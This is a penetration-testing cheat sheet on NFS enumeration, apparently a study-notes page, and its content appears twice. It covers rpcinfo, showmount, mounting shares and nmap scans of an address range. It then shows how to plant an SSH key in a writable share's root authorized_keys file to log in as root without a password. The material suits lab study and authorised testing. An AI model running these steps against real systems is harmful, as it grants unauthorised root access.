NFS Enumeration (Port 111, 2049)

Quick Intro

Developed in 1984 by Sun Microsystem and similar to SMB because it allows access to files over a network.
Common ports used by NFS are port 111 and 2049 tcp/udp
It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.

Identifying if NFS is in use

rpcinfo -p <ip>

# If you get 111 and 2049 listed , shares are enable and we can mount them

Show all mounts

if nfs is available, use showmount to view available mounting points

showmount -e $ip

you can then mount the file system with the mount command and interact with remote system
first create the directory for mounting -
mkdir /mnt/nfs

mount -t nfs $ip:/share /mnt/nfs

Unmounting the shares

umount -f -l /mnt/nfs
# -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.)
# -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.)

Permission Denied ?

Further Exploitation

If you can write to the remote hosts, try to put ssh key there so that we can get remote ssh without password ,

ssh keygen
# Generating ssh keys

cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
# Putting it to remote host

ssh root@$ip
# Now can login without password on target

Nmap Scan on RPCbind and NFS

nmap -v -p 111 10.11.1.1-254

nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap -p 111 --script nfs* 10.11.1.72

PreviousSNMP Enumeraion (Port 161)NextSMTP Enumeration (Port 25)

Last updated 3 years ago

NFS Enumeration (Port 111, 2049)

Quick Intro

Developed in 1984 by Sun Microsystem and similar to SMB because it allows access to files over a network.
Common ports used by NFS are port 111 and 2049 tcp/udp
It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.

Identifying if NFS is in use

rpcinfo -p <ip>

# If you get 111 and 2049 listed , shares are enable and we can mount them

Show all mounts

if nfs is available, use showmount to view available mounting points

showmount -e $ip

you can then mount the file system with the mount command and interact with remote system
first create the directory for mounting -
mkdir /mnt/nfs

mount -t nfs $ip:/share /mnt/nfs

Unmounting the shares

umount -f -l /mnt/nfs
# -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.)
# -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.)

Permission Denied ?

[Write-up] Vulnix - playing around with NFS - Christophe Tafani-DereeperChristophe Tafani-Dereeper

Further Exploitation

If you can write to the remote hosts, try to put ssh key there so that we can get remote ssh without password ,

ssh keygen
# Generating ssh keys

cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
# Putting it to remote host

ssh root@$ip
# Now can login without password on target

Nmap Scan on RPCbind and NFS

nmap -v -p 111 10.11.1.1-254

nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap -p 111 --script nfs* 10.11.1.72

PreviousSNMP Enumeraion (Port 161)NextSMTP Enumeration (Port 25)

Last updated 3 years ago

Quick Intro

Identifying if NFS is in use

Show all mounts

Mount a NFS share

Unmounting the shares

Permission Denied ?

Further Exploitation

Nmap Scan on RPCbind and NFS

Quick Intro

Identifying if NFS is in use

Show all mounts

Mount a NFS share

Unmounting the shares

Permission Denied ?

Further Exploitation

Nmap Scan on RPCbind and NFS